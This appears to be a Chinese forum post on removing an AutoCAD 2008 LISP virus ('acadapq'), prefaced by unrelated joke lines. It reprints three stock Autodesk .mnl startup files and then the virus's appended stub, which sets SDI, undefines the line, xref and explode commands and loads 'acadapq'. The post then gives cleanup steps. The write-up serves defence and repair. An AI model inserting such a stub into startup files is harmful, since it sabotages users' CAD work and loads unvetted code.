最新AUTOCAD病毒清除办法——原创.txt跌倒了,爬起来再哭~~~低调!才是最牛B的炫耀!!不吃饱哪有力气减肥啊?真不好意思,让您贱笑了。我能抵抗一切,除了诱惑……老子不但有车,还是自行的……最新AUTOCAD病毒清除办法——原创.txt单身很痛苦,单身久了更痛苦,前几天我看见一头母猪,都觉得它眉清目秀的什么叫残忍? 是男人,我就打断他三条腿;是公狗,我就打断它五条腿! 最新AUTOCAD病毒清除办法——原创
最近电脑中了AUTOCAD病毒了,上网查了一下解决办法,结果一个都不起作用,然后自己寻思解决方法,终于在一个错误的时间错误的地点我发现了病毒代码的老巢,随后将其清除出去。下面讲一下我的抗毒过程,希望对各位有所帮助。不足之处请多指教。
首先描述一下病毒特征:打开AUTOCAD2008以后速度很慢,在命令里面会出现以下提示:
加载自定义文件成功。自定义组: ACAD
加载自定义文件成功。自定义组: CUSTOM
正在重生成模型。
; 错误: LOAD 失败: "acadapq"
AutoCAD 菜单实用程序已加载。; 错误: LOAD 失败: "acadapq"
; 错误: LOAD 失败: "acadapq"
; 错误: LOAD 失败: "acadapq"
命令: COMMANDLINE
上述提示结束后,接着是直线命令无法使用,不能在一个窗口中打开多个CAD文件(每打开一个CAD文件就会出现一个窗口,很耗系统资源)
下面讲讲如何清除病毒代码,首先打开C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2008\R17.1\chs\Support文件夹,找到acad.mnl,AecArchXOE.mnl,acetmain.mnl这个三个文件。这三个文件里面的原始代码如下:
acad.mnl中的代码:
;;; ACAD.MNL
;;; Copyright (C) 1992 - 1997 by Autodesk, Inc.
;;;
;;; Permission to use, copy, modify, and distribute this software
;;; for any purpose and without fee is hereby granted, provided
;;; that the above copyright notice appears in all copies and
;;; that both that copyright notice and the limited warranty and
;;; restricted rights notice below appear in all supporting
;;; documentation.
;;;
;;; AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
;;; AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
;;; MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
;;; DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
;;; UNINTERRUPTED OR ERROR FREE.
;;;
;;; Use, duplication, or disclosure by the U.S. Government is subject to
;;; restrictions set forth in FAR 52.227-19 (Commercial Computer
;;; Software - Restricted Rights) and DFAR 252.227-7013(c)(1)(ii)
;;; (Rights in Technical Data and Computer Software), as applicable.
;;;
;;; Changes to this file will be migrated to future
installations of
;;; AutoCAD during migration.
;;;
;;; This file is loaded automatically following the menu ACAD.
;; Silent load.
(princ)
AecArchXOE.mnl中的代码:;;;
;;; AutoCAD Architecture Release 2004 Object Enabler
;;; Menu Lisp File - AECARCHXOE.MNL
;;;
;;; Copyright ?2003 by Autodesk, Inc.
;;;
;;; Permission to use, copy, modify, and distribute this software
;;; for any purpose and without fee is hereby granted, provided
;;; that the above copyright notice appears in all copies and
;;; that both that copyright notice and the limited warranty and
;;; restricted rights notice below appear in all supporting
;;; documentation.
;;;
;;; AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
;;; AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
;;; MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
;;; DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
;;; UNINTERRUPTED OR ERROR FREE.
;;;
;;; Use, duplication, or disclosure by the U.S. Government is subject to
;;; restrictions set forth in FAR 52.227-19 (Commercial Computer
;;; Software - Restricted Rights) and DFAR 252.227-7013(c)(1)(ii)
;;; (Rights in Technical Data and Computer Software), as applicable.
;;;
;;; --------------------------------------------------------------------------
;;;
;;; This file is loaded automatically following the menu AECARCHXOE.
;;;
(if (not (member "aecuibase.arx" (arx)))
(progn
(if (findfile "aecuibase.arx")
(arxload (findfile "aecuibase.arx"))
)
)
)
(princ)
acetmain.mnl中的代码:
;;
;;;
;;; ACETMAIN.MNL
;;; Copyright ?1999 by Autodesk, Inc.
;;;
;;; Your use of this software is governed by the terms and conditions of the
;;; License Agreement you accepted prior to installation of this software.
;;; Please note that pursuant to the License Agreement for this software,
;;; "[c]opying of this computer program or its documentation except as
;;; permitted by this License is copyright infringement under the laws of
;;; your country. If you copy this computer program without permission of
;;; Autodesk, you are violating the law."
;;;
;;; AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
;;; AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
;;; MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
;;; DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
;;; UNINTERRUPTED OR ERROR FREE.
;;;
;;; Use, duplication, or disclosure by the U.S. Government is subject to
;;; restrictions set forth in FAR 52.227-19 (Commercial Computer
;;; Software - Restricted Rights) and DFAR 252.227-7013(c)(1)(ii)
;;; (Rights in Technical Data and Computer Software), as applicable.
;;;
;;; ----------------------------------------------------------------
; ----------
-- PLACE THE EXPRESS PULL-DOWN FUNCTION -------------
; This function places the Express pull-down to the left of the
; Window pull-down on the acad menu. If FLG is true the current
; Express pull-down if present will be removed and placed again.
; If FLG is nil and the pull-down is present, nothing will be done
;
; When placing the Express menu, acad's Window menu is used to
; determine the pull-down location. if the Window pull-down is
; missing, the Help pull-down will be used instead. If that too
; is missing, it will place the Express pull-down after the last
; menu location.
; ----------------------------------------------------------------
; Place the Express Tools pulldown to the left of the last pulldown already loaded
(defun acet-init-placemenu( / n )
(if (menugroup "EXPRESS")
(progn
(setq n 1)
(while (< n 24)
(if (menucmd (strcat "P" (itoa n) ".1=?"))
(setq n (+ n 1))
(progn
(if (> n 3)
(setq n (- n 2))
(setq n 3)
);if
(menucmd (strcat "p" (itoa n) "=+EXPRESS.pop1"))
(setq n 25)
);progn
);if
);while
);progn
);if
);defun acet-init-placemenu
(acet-init-placemenu)
(princ)
以上三个文件中毒之后,会在以上各自文件代码的后面植入一段病毒代码,代码如下:
从代码(setvar "sdi" 1)
(setvar "ACADLSPASDOC" 1)
(command "undefine" "line")
(command "undefine" "_line")
(command "undefine" "xref")
(command "undefine" "_xref")
(command "undefine" "explode")
(command "undefine" "_explode")
(setvar "cmdecho" 1)
(load "acadapq")
中可以看出,病毒将SDI的默认值有0改为了1,所以就不能够在同一个窗口中打开多个CAD文件了。其中执行了command "undefine" "line"这段代码禁用了直线(line)命令,所我们无法使用直线工具,在病毒运行的情况下,在命令行里面输入redefine这个命令,然后输入line就可以恢复使用直线工具了。
上面对病毒代码分析了一下,后面的工作就简单了,只要把病毒代码从这三个文件中删除,然后保存文件,将文件属性改为只读。到此为止病毒清理工作完毕。打开CAD速度很快的。病毒清理之后出现了一个新的问题,打开CAD的时候会出现以下命令提示:
; 错误: 参数类型错误: streamp nil
; 错误: 参数类型错误: streamp nil
命令: COMMANDLINE
这个问题目前未能解决,但是该问题不会对CAD使用产生影响(到目前为止)。
本文以autocad2008为例,其他版本没有测试,各位不妨一试。
版权归作者所有,转载请注明出处。作者:朱东亮